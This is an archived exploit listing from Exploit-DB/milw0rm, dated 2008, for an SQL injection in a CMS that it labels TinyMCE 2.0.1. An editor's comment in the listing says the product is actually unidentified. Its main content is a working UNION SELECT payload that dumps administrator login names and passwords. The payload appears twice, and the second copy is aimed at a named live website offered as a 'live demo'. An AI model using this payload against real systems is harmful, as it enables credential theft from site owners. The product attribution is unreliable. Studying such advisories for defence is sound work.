TinyMCE Remote SQL Injection

vendor:

TinyMCE

by:

AnGeL25dZ

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: TinyMCE

Affected Version From: TinyMCE Version 2.0.1

Affected Version To: TinyMCE Version 2.0.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TinyMCE Remote SQL Injection

index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers

Mitigation:

Input validation and sanitization

Source

Exploit-DB raw data:

# removed from the frontend, the product affected isn't TinyMCE.
# if you know which CMS this is please contact me 
# /str0ke





************************************************************
** 		 TinyMCE Remote SQL Injection
************************************************************
**  Prodcut:		TinyMCE  Version 2.0.1
**  Home   : 		http://tinymce.moxiecode.com
**  Vunlerability :		2/ SQL Injection
**  Risk  :			high !!
**  Dork : 		N/A
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH
**		 All Members of HackTeachTeam	http://www.hackteach.org/
** 		 Ra3ch, His0k4
************************************************************
**  Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************

# milw0rm.com [2008-12-17]